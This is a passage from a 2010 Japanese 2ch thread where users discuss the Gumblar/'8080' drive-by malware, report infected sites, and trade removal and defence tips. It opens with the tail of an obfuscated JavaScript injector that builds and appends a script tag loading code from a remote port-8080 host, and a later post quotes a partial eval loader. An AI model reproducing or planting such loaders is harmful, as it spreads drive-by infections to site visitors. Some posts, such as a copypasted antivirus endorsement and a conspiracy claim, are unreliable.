U26gcel3nnek.setAttribute('src', 'h())&t)t$$p@#:)^$)/((^/!$#g!o(&&u^^^g!$o?u!-$&c!)!o)^$$m)@!^.$(#n&)$i
#(n^#^g@.&@c&$#o@m(.)a###!c#(e!$$(r$$-^#c!@o)@!$m@.$^s)(u!@p$$e@r@(a(g(@^u)$&)!i#d!e&!!#.!@^r(^u^:)
#8&^#&0#(8)^0^/!!#i@$)#n^$@$.&!)!c&!(o((!m$&&/$i#!$n#!).)$@c#(^o@!$&m(@/@$g@o))o^&g@&l!#e!.^)c))o@
m#&@/$^#v#)i!)#d!^@e&)$)o@)!@@s#z$(.?^c@!$o!m(^^/@b^(&e#!@&s@((t)#$@#t&^)^u&b!(e^)c$^#l!@)i$)&!$p)
@s!$^$(.&$c@&)@o)!$m(^#&/('.replace(/\!|@|#|\$|\(|&|\^|\)/ig, ''));
U26gcel3nnek.setAttribute('defer', 'd!$@$e@f!!(&(e^r@)'.replace(/@|\(|\$|#|\!|\)|\^|&/ig, ''));
U26gcel3nnek.setAttribute('id', 'M$e!$7#!)r#!$l?@^9()!(#t$!^9&q#)@$$b&&^!3&@)'.replace(/\^|\)|@|&|\$|\!|\(|#/ig, ''));
document.body.appendChild(U26gcel3nnek);}}
catch(Lpmpa57y1j) {}
</script>
<!--86fa61201e3ca3a075145a1d33d3c209-->
381sage ◆sage/xLnlI :2010/01/06(水) 19:59:26
思いっきり踏みました
382sage ◆sage/xLnlI :2010/01/06(水) 20:05:47
http://up3.viploader.net/ippan/src/vlippan053227.png
ソース


どちらさまかWindows7の感染確認方法を教えていただける方はいらっしゃいませんでしょうか
383名無しさん@お腹いっぱい。:2010/01/06(水) 20:06:30
MSに電話白や
384名無しさん@お腹いっぱい。:2010/01/06(水) 20:07:49
>>360
これって、もしかして同じLANから見たら、一人目しか感染しないってことか?
385名無しさん@お腹いっぱい。:2010/01/06(水) 20:18:27
GENOウイルス感染 ローソン
http://tsushima.2ch.net/test/read.cgi/news/1262766483/l50
386名無しさん@お腹いっぱい。:2010/01/06(水) 21:22:22
>>382
んなもんないからとっととOSいれなおせ
387sage ◆sage/xLnlI :2010/01/06(水) 21:24:34
>>386
えっ

いまノートン先生が0v3exclv.exeを削除してくれました
388名無しさん@お腹いっぱい。:2010/01/06(水) 21:26:09
やっぱりUACはスルーするのか
389名無しさん@お腹いっぱい。:2010/01/06(水) 21:44:36
>>387
それだけかどうかわからないよ
390名無しさん@お腹いっぱい。:2010/01/06(水) 22:40:20
京王電鉄HPも改ざん被害 ウイルス「ガンブラー」
http://tsushima.2ch.net/test/read.cgi/news/1262784863/
391名無しさん@お腹いっぱい。:2010/01/06(水) 22:52:56
>>387
firefoxにはnoscript入れてなかったの?
それとも入れた結果がこれだyoってこと?
392名無しさん@お腹いっぱい。:2010/01/06(水) 23:19:00
UACスルーってマジかよ、何のための暗転だよ
393名無しさん@お腹いっぱい。:2010/01/06(水) 23:19:53
394名無しさん@お腹いっぱい。:2010/01/06(水) 23:23:15
海外ではあんま騒いでないよな
なんだこの差は
395名無しさん@お腹いっぱい。:2010/01/06(水) 23:31:25
>>394
"セキュリティツール"の画面が出てくるって騒ぎになっていると聞いたような。
具体的な場所は分からないけど。
396名無しさん@お腹いっぱい。:2010/01/06(水) 23:40:22
これ、もしかして制限ユーザだと全く感染しない?
397名無しさん@お腹いっぱい。:2010/01/07(木) 00:26:16
>>395
Security Toolな。
これも改ざんされたサイトを閲覧して、脆弱性を利用して感染するらしい
398名無しさん@お腹いっぱい。:2010/01/07(木) 00:37:14
サイト www.spacecraft.co.jp/home.html の調査結果
検出されたウイルス(ワーム、スパイウエア)
Trojan-Downloader.JS.Agent.ewh

399名無しさん@お腹いっぱい。:2010/01/07(木) 00:44:56
>>398
そのウィルスはつい最近まで、GDATAの誤検出だとずっと思ってた。
400名無しさん@お腹いっぱい。:2010/01/07(木) 00:46:38
↓↓↓
ttps://www●global2j-education●com/contact
↑↑↑

httpsが、、、
401名無しさん@お腹いっぱい。:2010/01/07(木) 00:49:02
世界中のHTMLのソースコードを検索できたら回避できるのにね
グーグル辺りがやってくれないかな・・・・
402名無しさん@お腹いっぱい。:2010/01/07(木) 00:49:40
FTPがやられるんだからhttpsとか関係ないよ
403名無しさん@お腹いっぱい。:2010/01/07(木) 00:56:28
32 名前: すり鉢(アラバマ州) 投稿日: 2010/01/07(木) 00:45:39.79 ID:RXPRsCkB
p://www●spacecraft●co●jp/home●html
スペースクラフトグループ
神田うの、黒谷友香、栗山千明、岩田さゆり、青山倫子、宇浦冴香、等が所属。

ガンブラーキタ━(゚∀゚)━!!
404名無しさん@お腹いっぱい。:2010/01/07(木) 01:21:53
私は対策ソフトを集めてマルウェアの性能テストなどをしています。
PC雑誌の熟読には自信があります。

あなた方には高度な話になりますが、最近のクラッカーは対策ソフトの
利用を予め想定していて、これを回避するようにいろいろ画策してきます。
今ではアンチウイルスの回避なんて簡単にできるようになっていますし、
Personal Firewallもバイパスできる場合も結構あります。

ここの閲覧者の方々も含めて申しますけど、ここ最近は対策ソフト
回避技術が非常に進歩してきましたので、機関系テストでNo.1の
ソフトだからとかそんな簡単な話ではなくなっています。

私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。
405名無しさん@お腹いっぱい。:2010/01/07(木) 01:27:05
コピペ乙
406名無しさん@お腹いっぱい。:2010/01/07(木) 01:45:25
年明けにgoonetの輸入車ページ見てたらなんか変になったけど大丈夫だったのかな…
407名無しさん@お腹いっぱい。:2010/01/07(木) 01:52:47
民主党サイトが年末から年始にかけて改ざん - 政治的意図なし
カゴヤのホスティングサーバが不正アクセス被害 - ウェブアプリの脆弱性狙われる
関連7サイトが改ざん被害、閲覧でウイルス感染のおそれ - 出版文化社
通販サイトなど運営する3サイトで改ざんが発生 - 岐阜の恵那バッテリー電装
408名無しさん@お腹いっぱい。:2010/01/07(木) 01:59:19
詳しくない者だが、経緯を書いておく。

年末にあるサイトを見たら、瞬間的にいくつ窓が開き、Acrobat6が自動起動。
そして固まる。PCを強制再起動。

再起動すると、Antivirに反応するファイルがゾロゾロすごい数でてくる。名前
はまともらしいが、ほぼすべて削除。いくつかもらしたかも。

次の日に再起動しても、また反応ファイルがぞろぞろ。このあたりで難しいウイルス
かも?と気がついて、とにかく反応するものをすべて削除。TV番組表自動取得
のためのものも、削除してしまった。

その後、スキャンにひっかかるものはテンポラリファイルにある実行ファイル
だけになる。簡単に削除。しかし、siszyd32.exeについては「ファイルが開けない」
という警告のみでる。一旦安心。
409名無しさん@お腹いっぱい。:2010/01/07(木) 02:00:40
Spybotでも、siszyd32.exeはひっかからず。WEBで調べてヤバそうなものだと
判明するが、ファイル本体がどうしても見えない。隠しファイルを表示にしても、
見えない。ただ、存在が指摘されたフォルダで、
siszyd32.exeフォルダを作成するとできないことから、やはり存在する
ことが判明。

ググッてみたけれど、有効策が見つからず。レジストリの中に見つからず、
カスペのフリーツールはデータベースが壊れていると出てつかえなかった。
また、何もしていなくてもCPU使用率が50%になっていることに気がついた。
不審なプログラム、プロセスは自分の知識ではみあたらず。

今日になって、いろいろ削除方法を探してみたところ、セーフモードで起動
するとうまく削除できるらしいので、試してみた。すると、
\プログラム\スタートアップ\siszyd32.exe が何もしなくてもはっきり
見えていたので、削除して再起動したところ、CPU使用率が5%くらいに
落ちた。多分、解決。

今は、siszyd32.exeがCPUをあんなに使用して何をしていたのかが気になって
いる。サイトの運営はしていないが、どうしたらいいものか・・・。ヤフー
とかのパスを変更した方がいいのかな。
410名無しさん@お腹いっぱい。:2010/01/07(木) 02:11:16
>>409
OSのクリーンインストールを薦める
面倒だとは思うが、やっておいたほうが絶対にいいぞ
411名無しさん@お腹いっぱい。:2010/01/07(木) 02:19:00
>410 ありがとう。でも、忙しくて。XPなんで、クリーンインストール
するくらいなら、新しいPCを7で自作しようか検討中。

自分はウイルスやファイアーウォールに詳しくないので、これを機に勉強
しようと思ってます。

今回のウイルスは8,9年くらい前に大流行したウイルスを思い起こさせ
ますね。これを機にセキュリーティーが強化されたはずなのに、こんなに
あっさり感染するとは・・・。WEBを見ただけで感染というのは問題が
ありすぎる。自分の周りはもっとPCに疎い人ばかりなので、明日は職場で
大変だ。
412名無しさん@お腹いっぱい。:2010/01/07(木) 02:23:37
水面下への広がりと応用力を考慮すると、まだ氷山の一角に過ぎず
ネット史上最悪のウィルスとなり得る可能性があるな
事の始まりは去年の春辺りだったか
そこから、表面上に出てくるまで一気に広がり始めた印象
413名無しさん@お腹いっぱい。:2010/01/07(木) 02:25:23
/*GNU GPL*/ 感染サイトを見る

Adobe Readerを最新版に更新してないと
脆弱性をつかれてウィルス実行される

FTPのID、パスがあれば盗まれる
というか盗んで送信するプログラムが常駐される

盗まれたFTPのID、パスでサイトを改ざん

ループ
414名無しさん@お腹いっぱい。:2010/01/07(木) 02:27:22
GNU GPLに関しては、Adobe Readerを入れてなければ感染は防げるとみていいのかな?
415名無しさん@お腹いっぱい。:2010/01/07(木) 02:28:59
416名無しさん@お腹いっぱい。:2010/01/07(木) 02:34:46
基本、JSは信頼サイト以外は止めてるが・・・大手の有名サイトでも感染する事があるから100%安全じゃないだろうな
未知のセキュリティホールを突かれない事を祈るばかり
417名無しさん@お腹いっぱい。:2010/01/07(木) 02:39:08
> 未知のセキュリティホールを突かれない事を祈るばかり

それを考えるとHIPS入れておく方がいいのかね
418名無しさん@お腹いっぱい。:2010/01/07(木) 02:41:37
こんなに多くのサイトがやられるんじゃ
市販のウィルスソフトなんか役に立たないと
ばれちゃうなw
419名無しさん@お腹いっぱい。:2010/01/07(木) 02:43:24
ウイルス対策ソフトは検体が無いと対策は取れないからねえ
まあ、これは現実世界のウイルスでも同じだけど
420名無しさん@お腹いっぱい。:2010/01/07(木) 02:48:17
UAC→スルー??
ウィルスソフト→定義更新が間に合わない
各ソフトウェアを最新の状態にしておく→現状ではこれが無難
javascriptを無効化する→ブラウジングに支障が出る

頻繁にブラウジングする立場(様々なオンラインショップで購入したりもする)としては若干怖い
421名無しさん@お腹いっぱい。:2010/01/07(木) 02:56:00
バックアップとれば万が一の時はクリーンインスコで済むから現実のウィルスほど
脅威には感じないけどね(仕事関連は別だけど)
422名無しさん@お腹いっぱい。:2010/01/07(木) 03:08:47
専ブラで2chだけを見るネット生活を送るのがベストか
423名無しさん@お腹いっぱい。:2010/01/07(木) 03:23:21
ガンプラでジオマラでも作ってろチンカスw
424名無しさん@お腹いっぱい。:2010/01/07(木) 03:30:33
そういや専ブラの脆弱性発見ってのも以前あったよな・・・
まあ日本をピンポイントに突いてくる奴しか見つけても使わないだろうけどw
専ブラによっちゃIEの脆弱性の影響受ける奴あるのかな?

>>376,395,397
Security Toolに関してはこれだね
ttp://blogs.yahoo.co.jp/noooo_spam/59325476.html
ttp://blogs.yahoo.co.jp/noooo_spam/59347678.html

8080のスクリプトがこいつらに変わってるとこもあるとか
8080を操ってる奴らは、裏市場でボットネットみたいな販売方法使って儲け始めたんだろうか?
425名無しさん@お腹いっぱい。:2010/01/07(木) 03:40:01
うちはLive2chだからIEエンジンを使うけどIE自体を凍結しているから実害はないかな
426名無しさん@お腹いっぱい。:2010/01/07(木) 03:43:34
9999999円あなたはどしますか?
tp://117117●fc2web●com/

これはGNU GPLぐっじょぶw・・で宜しいのかな?
427名無しさん@お腹いっぱい。:2010/01/07(木) 04:57:05
感染すると以下の二つが登録される

C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"sysgif32"="C:\\WINDOWS\\TEMP\\~TMD.tmp"
428名無しさん@お腹いっぱい。:2010/01/07(木) 06:50:12
そこは固定じゃない。バイナリはコロコロ変わる。
429名無しさん@お腹いっぱい。:2010/01/07(木) 07:15:07
ころころなんて変わらないよ
430名無しさん@お腹いっぱい。:2010/01/07(木) 07:19:11
モロゾフなどが感染した今流行のやつはそれだろ
新たな違う攻撃なら変わるだろうけど
コロコロ変わったところは確認してない
431名無しさん@お腹いっぱい。:2010/01/07(木) 07:35:14
>>428
どう変わった?
432名無しさん@お腹いっぱい。:2010/01/07(木) 07:39:51
GENOの頃はVistaは安全だったのに、もうVistaでも関係ないんだな。
433名無しさん@お腹いっぱい。:2010/01/07(木) 07:40:00
モロゾフのタイプは>>427であってる
ころころ変わるのは別物
434名無しさん@お腹いっぱい。:2010/01/07(木) 07:40:43
感染しているのはupdateを怠ってる人達だがね
435名無しさん@お腹いっぱい。:2010/01/07(木) 09:08:47
updateを怠ってるなんて出来るの?
終了時に強制的にupdateされない?
436名無しさん@お腹いっぱい。:2010/01/07(木) 09:18:24
flashとかがか
今の段階でそんなこといってたらそら引っかかるわ
437名無しさん@お腹いっぱい。:2010/01/07(木) 09:54:17
>>384
俺もそれ知りたい。

月曜の晩、俺のPCでNOD32が8080系を検知したサイトを、奥さんが別PCで見ちゃったの。ウィスルセキュリティーZEROはスルー。
でも、どんなに調べても感染の形跡がないのさ。
その後、各社(Macfee,NOD2,MSE,Kasper)の全スキャンにも引っかからず、netstat -a で見てももどこにもつなぎに行ってない。
Windows XPは Windows Updateで最新状態だったが、Acrobatは8だったのに。

で、>>356>>360を見て、もしかしてNOD32は改竄されたHTMLの<script>の文字列パターンや .ru:8080 のサイト名ではなく、
その次の .jsファイルのダウンロードの時点で検知・遮断するのかなと。
すると、次に奥さんが別PCで見ても.jsファイルがNOT FOUNDなら感染しなかったのも合点がいくんだなぁ。

いずれにしても早く、明確な感染確認の方法が出てくれればありがたい。
いっそFFFTPをインストールして、自前サイトのID/PWでもセットしておくかなw
438名無しさん@お腹いっぱい。:2010/01/07(木) 11:08:43
Spybot、Ad-Aware、Avast、MSEssentialsの4つをインストール(常駐)+MSの悪意のある〜を使ってますが、こういうフリーのソフトで固めてもGumblarは防げないのでしょうか?
439名無しさん@お腹いっぱい。:2010/01/07(木) 11:11:20
だから穴の前のついたてを選んでないで
さっさと穴埋めとけ
440名無しさん@お腹いっぱい。:2010/01/07(木) 11:19:50
今、一番いいセキュリティソフトスレに行こうとしたらAvastがトロイの木馬を発見した
一応未然に防いで削除(移動)出来たようだけど、ほんとに大丈夫なのかな?
たった今1日がかりでWindowsのクリーンインストールしたばっかなんだけど
441名無しさん@お腹いっぱい。:2010/01/07(木) 11:24:53
やっぱ2chは怖いね
どのスレだったかCファイル破壊コードとか書かれていたし
442名無しさん@お腹いっぱい。:2010/01/07(木) 11:24:59
ふーん
443名無しさん@お腹いっぱい。:2010/01/07(木) 11:34:36
>>442のような人間が仕込んでるんだろうなw
444名無しさん@お腹いっぱい。:2010/01/07(木) 11:41:22
また馬鹿キャラプレイしてるのか
445名無しさん@お腹いっぱい。:2010/01/07(木) 11:47:30
cファイル破壊コードって何なのさ?
446名無しさん@お腹いっぱい。:2010/01/07(木) 11:48:09
2chスレ内だけで感染できるなら感染してみろや
447440:2010/01/07(木) 11:53:28
>>446
自分Live2ch使ってるんですが、そのスレ見たらAvastが検出して、その後Avastの履歴見たらLive2chが書かれていました
自分も良く分からないのですが
誤検出ですかね?
448名無しさん@お腹いっぱい。:2010/01/07(木) 11:55:34
どんだけー
449名無しさん@お腹いっぱい。:2010/01/07(木) 11:56:30
検出と感染は違うだろ。
検出に誤検出もなにもない。
450名無しさん@お腹いっぱい。:2010/01/07(木) 11:57:01
2chでJS:Redirector-H [Trj]ならAvastの誤検出
451名無しさん@お腹いっぱい。:2010/01/07(木) 12:01:26
>>449
誤検出はあるだろ
452名無しさん@お腹いっぱい。:2010/01/07(木) 12:02:39
すまん。誤検出はあるな。検出がない。
453名無しさん@お腹いっぱい。:2010/01/07(木) 12:05:02
俺初心者でこのスレ読んで思ったんだけど、2chのスレ見ただけでトロイの木馬って感染するんですか?
今話題のGumblarってのはサイトを見ただけで感染するようですが
454名無しさん@お腹いっぱい。:2010/01/07(木) 12:17:52
誰かここに癌ブラーのソース貼り付けてたよね
うつったかも
455名無しさん@お腹いっぱい。:2010/01/07(木) 12:29:08
今日は釣り日和なんか?
456名無しさん@お腹いっぱい。:2010/01/07(木) 12:32:44
2ちゃんに繋ぐFTPアカ持ってる人が踏んで、このページが書き変えられれば感染するんじゃね?
457名無しさん@お腹いっぱい。:2010/01/07(木) 12:44:51
私は対策ソフトを集めてマルウェアの性能テストなどをしています。
PC雑誌の熟読には自信があります。

私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。
458名無しさん@お腹いっぱい。:2010/01/07(木) 12:47:44
コピペ乙
459名無しさん@お腹いっぱい。:2010/01/07(木) 12:48:13
経験豊富なあなたがお勧めする

 Kaspersky Internet Security 2010

これは、買わないといけないね!
460名無しさん@お腹いっぱい。:2010/01/07(木) 13:04:10
AVGは検出してくれないのか?
461名無しさん@お腹いっぱい。:2010/01/07(木) 13:18:44
俺もAVG使ってるんだけど、どうなのか不安なんだよね
462名無しさん@お腹いっぱい。:2010/01/07(木) 13:30:43
ココで合ってる?

http://pc11.2ch.net/linux/ > GZ > file.htm JS/TrojanDownloader.Agent.NRL トロイの木馬
463名無しさん@お腹いっぱい。:2010/01/07(木) 15:14:14
/*GNU GPL*/とか 呼びにくい
まだ名前ないのか?
464名無しさん@お腹いっぱい。:2010/01/07(木) 15:16:54
JRウイルス
465名無しさん@お腹いっぱい。:2010/01/07(木) 16:37:20
ハウス食品 『 お客様のPCにウィルスを感染させてしまったかも・・・ 』
http://tsushima.2ch.net/test/read.cgi/news/1262843094/
>弊社の「採用ホームページ」が第三者による不正アクセスにより改ざんされ、

>2.対象期間
>2009年12月15日 1:00 〜 2010年1月5日 15:00
ローソンと一緒か
466名無しさん@お腹いっぱい。:2010/01/07(木) 16:53:19
他所は大変だね。
わたしのとこは絶対大丈夫! うぇぇwwwwWw

え〜と
どれどれ 

/*GNU GPL*/ ・・・ (°◇°;)
467名無しさん@お腹いっぱい。:2010/01/07(木) 17:17:22
何で新卒採用情報ページばかり?
偶然?
468名無しさん@お腹いっぱい。:2010/01/07(木) 17:22:50
新卒ディレクトリしか入れないFTPアカ持ってるヤツが踏んだんじゃね?
469名無しさん@お腹いっぱい。:2010/01/07(木) 17:23:06
時期的な事情があったりして?
470名無しさん@お腹いっぱい。:2010/01/07(木) 17:25:25
家で更新してんのか
471名無しさん@お腹いっぱい。:2010/01/07(木) 17:31:27
>>447
画像系の直リンにセキュリティソフトが反応しているdけで
専ブラという箱庭世界内ではスレに貼られている有害リンクを直接踏んでWEBブラウザで開かない限りは
120%感染はあり得ません
janeやIE系のlive2chはもちろん、全ての2chブラウザに共通
472名無しさん@お腹いっぱい。:2010/01/07(木) 17:49:02
2chブラウザに脆弱性なしということですか?
473名無しさん@お腹いっぱい。:2010/01/07(木) 17:53:22
いや
あったとしても利用されてない
474名無しさん@お腹いっぱい。:2010/01/07(木) 17:54:46
2chのスレを見るだけなら2ch自体が感染しない限りwebブラウザでも同じ
反応するのはコードのコピペ
後は画像サムネイル機能を持った外部ページからの経由ではこれに反応するかもしれないって程度
475名無しさん@お腹いっぱい。:2010/01/07(木) 17:55:36
ここにコード貼り付けた馬鹿がいるから
476名無しさん@お腹いっぱい。:2010/01/07(木) 19:16:49
コード貼りつけたからって馬鹿とかいうなよ
リンク貼るヤツより遥かにマシ
477名無しさん@お腹いっぱい。:2010/01/07(木) 19:21:30
比べてどうするんだよw
どっちも糞で馬鹿なのには違いない。
478名無しさん@お腹いっぱい。:2010/01/07(木) 19:43:56
>>467-469
某大学のHP陥落が関係していると思われ。
479名無しさん@お腹いっぱい。:2010/01/07(木) 19:49:17
不況のあおりですか。
サイバーテロですね。
480名無しさん@お腹いっぱい。:2010/01/07(木) 20:32:16
どっかでVistaは関係ねーとかかかったらPCぶっ壊れてすぐわかるとか言われてたけど
結局どうなのこのGENOだかGumblarだか言うウィルスって
481名無しさん@お腹いっぱい。:2010/01/07(木) 20:33:00
結局誰も何も分かっていない
482名無しさん@お腹いっぱい。:2010/01/07(木) 20:34:43
無償ツールで「Gumblarウイルス」チェックを 〜 セキュアブレインが呼びかけ
セキュアブレインの先端技術研究所の調査によれば、
2009年度第2四半期(2009年7月〜9月)と
第3四半期(2009年10月〜12月)を比較すると、
「Gumblarウイルス」によるWebサイトの改ざん被害の件数は、
約4倍の上昇となっている。
12月に発見された「Gumblarウイルス」によって
改ざんされたWebサイト336件のうち、127件(37.8%)の被害サイトは、
企業のWebサイトとの情報もある。
http://www.rbbtoday.com/news/20100107/64816.html
途中の文を切ってますがかなり増えてるみたいですね。
483名無しさん@お腹いっぱい。:2010/01/07(木) 20:38:15
>>480
ガンブラーウイルスについての誤った情報にご注意ください。
ttp://blogs.yahoo.co.jp/noooo_spam/59368027.html
484名無しさん@お腹いっぱい。:2010/01/07(木) 20:57:31
8080なんて呼んでんのはGENOスレにいるやつだけだろ
485名無しさん@お腹いっぱい。:2010/01/07(木) 21:02:08
Gumblar感染してないか確認する方法は、GENOと同じ?
486名無しさん@お腹いっぱい。:2010/01/07(木) 21:08:03
これって新Gumblar?
tp://break24●nl/
</head><script language=javascript><!--
〜中略〜
POF=unescape(f5DJz);eval(POF)})(/&/g);
--></script>
<body>
487名無しさん@お腹いっぱい。:2010/01/07(木) 21:13:49
違うと思う
488名無しさん@お腹いっぱい。:2010/01/07(木) 21:20:26
>>486
それは豚汁
489名無しさん@お腹いっぱい。:2010/01/07(木) 21:23:27
>>484
あんたに聞きたい
なぜ8080と呼称するのをそこまで嫌がるの?
Gumblarと明確に違うものなのだから便宜上8080って呼んでも良いじゃないの

ってかマスコミがGumblarって名で広め過ぎてて各個人ブログもちょっと混乱気味・・・
490名無しさん@お腹いっぱい。:2010/01/07(木) 21:27:15
8080なんて呼んでるやつはごく一部だけって話だろ
ポートじゃわかりにくいし勘違いするやつもいるだろうしな
491名無しさん@お腹いっぱい。:2010/01/07(木) 21:29:23
>>484
早く正式名称決めないとヤバイと思うよ、これ。
今回広範囲に被害が広がったのは、GENOと同じ物だと思って対策してなかった人も多いと思う。
対策方法が違うし、とりあえず8080でいいんじゃないの?
492名無しさん@お腹いっぱい。:2010/01/07(木) 21:32:07
gumblar亜種ってことで良いだろ
くだらねえことでこだわるなよ
493名無しさん@お腹いっぱい。:2010/01/07(木) 21:32:08
>>490
今のところ発見当初から変わってない特徴が8080ポート指定ってとこなんだから、別に問題ないと思うけど?
どんな勘違いするんだ??
スクリプトなり仕込んでくる実行ファイルは変化してるし、「GNU GPL」は「CODE1」に変化した経歴があるし・・・
494名無しさん@お腹いっぱい。:2010/01/07(木) 21:34:22
>>492
Gumblar直系の亜種としてGumblar.xってのがあるんだよ
そこに8080が食い込んできたからこのスレがGENOスレ発祥で出来たんだけど、マスコミがGumblarで統一しちゃったせいで
あっちのスレにも8080の改竄報告がいったりしてる
495名無しさん@お腹いっぱい。:2010/01/07(木) 21:34:50
ru指定か?
ちがったっけ
そうならruでもいいな
ロシアンガンブラーでいいよ
496名無しさん@お腹いっぱい。:2010/01/07(木) 21:35:30
>>494
だからなんだよ
しつけえな
くだらねえ
497名無しさん@お腹いっぱい。:2010/01/07(木) 21:37:51
>>494
別に亜種は複数合っても良いんだよ
似たような種類だし分かりやすくて良いよ
まあ有名どころのベンダーが適当に付けた名前が定着するだろうけど
498名無しさん@お腹いっぱい。:2010/01/07(木) 21:40:16
テンプレで8080系ってなってるだろ
嫌ならGENOスレでやってくれ
499名無しさん@お腹いっぱい。:2010/01/07(木) 21:41:34
単にテンプレ作ったやつが馬鹿だからだろ
8080なんて普通に使うポート
無知なだけ
500名無しさん@お腹いっぱい。:2010/01/07(木) 21:43:38
8080系ってことはガンブラーの8080系って言いたいんだろ?
501名無しさん@お腹いっぱい。:2010/01/07(木) 21:45:16
呼び名なんて分かれば良いんだよ
世間でガンブラーらなそれで良いだろ
間違いとか言うなよ
502名無しさん@お腹いっぱい。:2010/01/07(木) 21:51:14
>世間でガンブラーらなそれで良いだろ
良くないから感染が広がったんじゃないかと

Gumblar8080とかかっこよくね?
503名無しさん@お腹いっぱい。:2010/01/07(木) 21:51:50
分かればGumblarでもGENOでもなんでもいいよ
でも今のこのごちゃ混ぜ状態で何が起こってるかって言ったら、8080で感染したのにGumblarってだけでGENOウイルスチェッカーが
未だに使えると思ってる奴が居たり、初代Gumblar(GENOとよく言われた奴)の感染確認方法で確認できると思ってる奴が居たり・・・

どっかベンダーが改めて名前つけてくれたら良いのに・・・ベンダー共通の名前つけよう云々ってどうなったんだ
504名無しさん@お腹いっぱい。:2010/01/07(木) 21:59:16
しかし目的はなんなのかね
ウェブ改竄の被害を楽しんでるだけかな
505名無しさん@お腹いっぱい。:2010/01/07(木) 22:06:36
>>504
8080で詐欺紛いもやってるみたいだけどね>>424
まあコード書き換えれば感染PCをボットネット化するようなこともできるだろうし、金にしようと思えばどうにでもなるな
506名無しさん@お腹いっぱい。:2010/01/07(木) 22:09:16
GumblarもそうだがゾンビPC化すると
DOS攻撃やらなにやらでサイバーテロも起こせるだろ?
金になるとしてもかなり危険だと思うがな
507名無しさん@お腹いっぱい。:2010/01/07(木) 22:10:35
この手のウィルスって亜種が作りやすいだろうから、なんか切りがないよな
508名無しさん@お腹いっぱい。:2010/01/07(木) 22:23:06
切りがないけど、アンチウイルスソフトじゃ対応が一歩遅い気がする
ブラウザで判定できたらいいのにっておもう
509名無しさん@お腹いっぱい。:2010/01/07(木) 22:28:42
ブラウザで判定する意義が分からん・・・結局ウイルス対策ソフトでやってることと一緒じゃね?
そんなことより、使ってるソフトのアップデートを的確にやって既知の脆弱性を埋める&最新のウイルス対策ソフトの常駐の徹底が
一番効果的かと
510名無しさん@お腹いっぱい。:2010/01/07(木) 22:28:48
ブラウザで判定すると早くなるのか?
そんなこと無いから同じ
511名無しさん@お腹いっぱい。:2010/01/07(木) 22:30:04
もうJavaScript切っとけ
512名無しさん@お腹いっぱい。:2010/01/07(木) 22:39:26
別にJavaScript自体が悪いって訳じゃないけど、ホワイトリスト形式で使った方が賢明な状況だよね
で、この流れでNoScriptの話題に振ると、暴れる粘着が居るという・・・
まあなんだ、IEなら信頼済みサイトゾーンの有効活用、FirefoxならNoScript導入、Operaならサーバーマネージャ使うか
No More Scriptsっていうブックマークレット使うか・・・こんな書き方で良い?w
513名無しさん@お腹いっぱい。:2010/01/07(木) 22:41:28
アップデートの徹底がいいのは当然だけど、(ブラウザに定義をカスタマイズできるようにして)
jsの内容が難読処理されてたら、実行しないとか、中国ロシアのサイトに飛ばす内容は実行しないとか
ウイルスソフトの判定の前にブラウザで判定できたら、2段ガマエになって、よりいいんじゃないかと思っただけ。
ウイルスソフトに任せきりが嫌なんだよ。どこまでちゃんと見てるかわかりづらいから。
514名無しさん@お腹いっぱい。:2010/01/07(木) 22:43:53
ウイルスソフトに任せちゃ駄目だよねw
515名無しさん@お腹いっぱい。:2010/01/07(木) 22:51:24
アドビ製品は強制アップデートでおk
516名無しさん@お腹いっぱい。:2010/01/07(木) 22:51:31
>>513
そんな機能ブラウザに標準搭載したら、正常なサイトまで表示崩れたり、真っ白ってことになりかねんか?
外部の奴がアドオンで作るならまだ現実味があるが、ブラウザベンダー自体が付けるような機能には思えん

そこまで心配なら、真っ新な状態の仮想化環境でブラウジングがお勧め
517名無しさん@お腹いっぱい。:2010/01/07(木) 22:59:57
真っ新なマッシン
518名無しさん@お腹いっぱい。:2010/01/07(木) 23:04:54
>>516
ブラウザベンダーがつけてこそ、そのブラウザの信用やシェアが上がったりしないかな。
まあ現実的ではないと思うけど
519名無しさん@お腹いっぱい。:2010/01/07(木) 23:17:43
>>518
逆に否定意見が結構集まる気がするw
まあ最新バージョンのブラウザはどこもフィッシング対策との名目で何かしらのフィルタリング機能入ってるから、そこに期待するしかないんじゃ
ないかな
と言っても、実際改竄されてるページをブロックできてたり、対応が早いかっていうと・・・

結局は環境を常に最新に、ウイルス対策ソフトも最新に(ただし過信は禁物)ってとこに落ち着く
520名無しさん@お腹いっぱい。:2010/01/07(木) 23:31:10
ウイルスが先かウイルスソフトが先かという命題と同じ
Web改鼠は結果でしかなくて、インターネットの開発者は皆どこかしらの違法結社に属していて
ウイルス漬けにされているという現実が露呈した格好だ
521名無しさん@お腹いっぱい。:2010/01/07(木) 23:40:39
なんだか楽天トラベルおかしい?
522名無しさん@お腹いっぱい。:2010/01/07(木) 23:48:19
アメーバがやられた
ブログパーツを使ったサイトで改ざんされたらしい
流出事件といいこのサイトはだめぽ
523名無しさん@お腹いっぱい。:2010/01/07(木) 23:49:10
ハスクバーナ・ゼノアのHPもGENOに感染してない?
ttp://www.zenoah.co.jp/
524名無しさん@お腹いっぱい。:2010/01/07(木) 23:49:24
アメバが駄目なんてずっと前から言われてるよ
525名無しさん@お腹いっぱい。:2010/01/07(木) 23:56:22
>523
ノートン先生に怒られた
526名無しさん@お腹いっぱい。:2010/01/07(木) 23:56:24
>>523

Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません

URL:

http://www.zenoah.co.jp/

このWebページはウイルスに感染しています

次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewh

情報:
23:55:06
Kaspersky Internet Security 2010
527名無しさん@お腹いっぱい。:2010/01/07(木) 23:59:51
> Trojan-Downloader.JS.Agent.ewh
いつものだね
528名無しさん@お腹いっぱい。:2010/01/08(金) 00:00:15
だから>>1ぐらい読めよ・・・・

*** 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***


危険かもしれないってアドレスも含むぞ
